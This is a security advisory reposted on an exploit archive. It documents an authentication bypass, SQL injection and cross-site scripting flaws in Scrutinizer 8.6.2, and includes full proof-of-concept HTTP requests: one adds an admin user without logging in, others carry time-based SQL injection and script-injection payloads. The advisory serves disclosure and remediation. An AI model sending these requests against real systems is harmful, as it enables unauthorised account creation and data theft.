exploit the possibilities

Scrutinizer 8.6.2 Bypass / Cross Site Scripting / SQL Injection

Scrutinizer 8.6.2 Bypass / Cross Site Scripting / SQL Injection
Posted Apr 12, 2012
Authored by Tanya Secker | Site trustwave.com

Scrutinizer NetFlow and sFlow Analyzer version 8.6.2 suffers from authentication bypass, cross site scripting, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
advisories | CVE-2012-1258, CVE-2012-1259, CVE-2012-1260, CVE-2012-1261
MD5 | 139e0d78c8ca14b9d0067df0efbd1350

Scrutinizer 8.6.2 Bypass / Cross Site Scripting / SQL Injection

Change Mirror Download
Trustwave SpiderLabs Security Advisory TWSL2012-008:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt

Published: 04/11/12
Version: 1.0

Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: 8.6.2 (8.6.2.16204) confirmed; others may be vulnerable

Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.

Credit: Tanya Secker of Trustwave SpiderLabs

Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-1258

The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.

Example:

This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.

#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19

{"new_user_id":"9"}


Finding 2: SQL Injection
CVE: CVE-2012-1259

The Scrutinizer web console is prone to unauthenticated SQL Injection
attacks due to user input not being appropriately validated and passed
directly to the backend. An attacker could exploit this vulnerability to
attempt to gain access to sensitive information within the database or to
perform other attacks on the system.

Example 1:

These requests/responses below show a blind SQL injection vector, where a
proof of concept is used to return a syntactically correct response from
the server (200 OK) followed by an incorrect one (500 Internal Server
Error).

#Request 1
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20AND%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 1
HTTP/1.1 200 OK
Date: Tue, 31 Jan 2012 23:51:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 230

#Request 2
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20ANffD%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi

#Response 2
HTTP/1.1 500 Internal Server Error
Date: Tue, 31 Jan 2012 23:52:18 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT
ETag: "900000001d93e-448-497918ae295c0"
Accept-Ranges: bytes
Content-Length: 1096
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

Example 2:

The "getPermissionsAndPreferences" variable within the following request is
also vulnerable to a blind time-based attack. The example payload included
will result in the server taking a delay of approximately five seconds
before returning a response.

#Request
http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&session_id=OyAOiECuFdtRbEBY&nocache=12_13_12_734

Example 3:

It should be noted that the other area referenced below returns SQL errors
when a comment character is introduced into the bolded parameters and may
therefore also indicate that they are vulnerable to SQL injection. The
below request demonstrates this activity.

#Request
http://127.0.0.1/d4d/alarms.php?loadAlarms=1&user_id=1&step=10&page=0&search_str=test&column=msg&fa_algorithm=all&order=modified_ts


Finding 3: Persistent Cross-site Scripting
CVE: CVE-2012-1260

The Scrutinizer web console stores unmodified user-supplied parameters
within its database. No input validation or character encoding is
performed, resulting in the possibility of client-supplied variables
forming aspects of page content in such a way as to affect the syntax of
the HTML content.

Example:

The below requests/response demonstrate how an attacker could use this to
implant arbitrary Javascript via the "newUser" parameter.

#Request 1
GET /cgi-bin/userprefs.cgi?newUser=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&pwd=guest2&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Length: 6

Accessing the "Admin" Panel using the below URL results in the stored
JavaScript executing in the browser. It is noted that due to the previous
flaw documented above this may also be executed unauthenticated and results
in the disclosure of all user group names and IDs, along with all usernames
and userids stored in the application. This is achieved via the following
URL:

#Request 2
http://127.0.0.1/cgi-bin/userprefs.cgi?menu=1&nocache=5_26_33_895

#Response 2
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:40:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 276

{"groups":[{"name":"<script>alert(2)</script>","id":"4"},{"name":"<script>alert(document.cookie)</script>","id":"3"},{"name":"Administrators","id":"1"},{"name":"Guests","id":"2"}],"users":[{"name":"\"><script>alert(1)</script>","user_id":"12"},{"name":"admin","user_id":"1"}]}


Finding 4: Reflected Cross-site Scripting
CVE: CVE-2012-1261

The Scrutinizer web console suffers from a Cross Site Scripting
vulnerability in the 'standalone' variable of the
'cgi-bin/scrut_fa_exclusions.cgi' page. No input validation or character
encoding is performed, resulting in the possibility of client-supplied
variables forming aspects of page content in such a way as to affect the
syntax of the HTML content.

Example:

The below request demonstrates the reflective cross-site scripting
vulnerability by supplying arbitrary JavaScript to the standalone variable.

#Request
GET /cgi-bin/scrut_fa_exclusions.cgi?init=1&standalone="><script>alert('xss')</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/cgi-bin/myview.cgi?init=1
Content-Length: 4

Note: Only one example of each vulnerability is provided but the problem is
categorized as "systemic" due to the potential to store or render script
code within multiple similar regions, such as in user group and alarm
areas, respectively.


Vendor Response:
The vendor has declined to comment on these findings. These issues appear
to have been fixed in version 9.0.1.

Remediation Steps:
Plixer International appeared to address all issues in version 9.0.1
(9.0.1.19899). It is strongly recommended that the latest stable
version is installed.

Additionally, Trustwave SpiderLabs has added rules to the ModSecurity
Commercial Rules Feed for these issues, and Trustwave's vulnerability
scanning solution, TrustKeeper, has been updated to detect all findings.

References
1. http://www.plixer.com
2. http://blog.spiderlabs.com

Vendor Communication Timeline:
2/15/12: Attempted to contact vendor regarding vulnerability
Repeated attempts throughout February and March without response
04/11/12 - Released after confirming fix in version 9.0.1 (9.0.1.19899)

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close